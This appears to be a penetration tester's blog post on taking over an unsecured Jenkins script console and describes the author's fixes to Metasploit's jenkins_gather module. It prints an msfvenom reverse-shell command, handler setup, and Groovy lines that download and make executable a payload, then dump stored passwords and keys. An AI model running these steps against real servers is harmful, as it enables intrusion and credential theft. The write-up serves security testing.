Attacking a temperamental ten-year-old Jenkins server

During my pen-testing, I’ve found it quite common to find Jenkins instances which either have open registration, or an easy-to-guess login combination. Jenkins has functionality that allows users to execute Groovy script via its /script/ endpoint. If this is not secured, an attacker can execute system commands on the Jenkins server, decrypt passwords, and steal keys.

The easiest way to exploit this is to use Metasploit’s exploit/multi/http/jenkins_script_console module to gain an initial shell, and then post/multi/gather/jenkins_gather, to dump all of the passwords and keys. The general method is outlined in the documentation for the script.

On my most recent encounter with this, the jenkins_script_console module refused to work for some reason.

Instead of using the typical jenkins_script_console script, instead I prepared a reverse shell payload myself, using Metasploit’s msfvenom.

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4444 -f elf -o /tmp/payload.bin

I then uploaded payload.bin to my web-server, to be downloaded later on on the Jenkins server.

Back on my host, I run msfconsole, and use the following:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 

On the Jenkins instance, I ran the following groovy code:

"wget -O /tmp/".execute().text
"chmod +x /tmp/payload.bin".execute().text

The connection with the Metasploit module is made, we background the session, and then we use the jenkins_gather

[*] Command shell session 1 opened ( -> at 2023-02-22 01:10:28 +0000

Background session 1? [y/N]  y
msf6 exploit(multi/handler) > use post/multi/gather/jenkins_gather
msf6 post(multi/gather/jenkins_gather) > set SESSION 1
msf6 post(multi/gather/jenkins_gather) > run

[*] Searching for Jenkins directory... This could take some time...

[-] No Jenkins installation found or readable, exiting...

Aaaand it failed. What? As it turns out, the server Jenkins was running on had a nearly full disk, and the hardware was over a decade old. The kernel was from 2014!

In order for the Metasploit module to determine where secrets are kept, find / -name 'secret.key.not-so-secret' is run, with a 120-second timeout. On this server, the find command was taking over two minutes, and even though I knew where the secrets were stored, I couldn’t force the module to use it. The other pitfall was that even if find did find the correct folder, it did not halt searching the drive after the first result; it would just time-out, due to the nearly-full drive.

I made a patch to add an optional variable that instructs the module to use a specific directory for the secrets, metasploit-framework/pull/17681.

Then, I ran into more trouble:

[-] Post failed: NoMethodError undefined method `empty?' for nil:NilClass
[-] Call stack:
[-]   /opt/metasploit-framework/embedded/framework/modules/post/multi/gather/jenkins_gather.rb:235:in `block in pretty_print_gathered'
[-]   /opt/metasploit-framework/embedded/framework/modules/post/multi/gather/jenkins_gather.rb:231:in `each'
[-]   /opt/metasploit-framework/embedded/framework/modules/post/multi/gather/jenkins_gather.rb:231:in `pretty_print_gathered'
[-]   /opt/metasploit-framework/embedded/framework/modules/post/multi/gather/jenkins_gather.rb:348:in `gathernix'
[-]   /opt/metasploit-framework/embedded/framework/modules/post/multi/gather/jenkins_gather.rb:363:in `run'

A bug in the jenkins_gather script meant that a (valid) empty SSH key would cause the script to crash. I pushed metasploit-framework/pull/17416 to fix that one, too.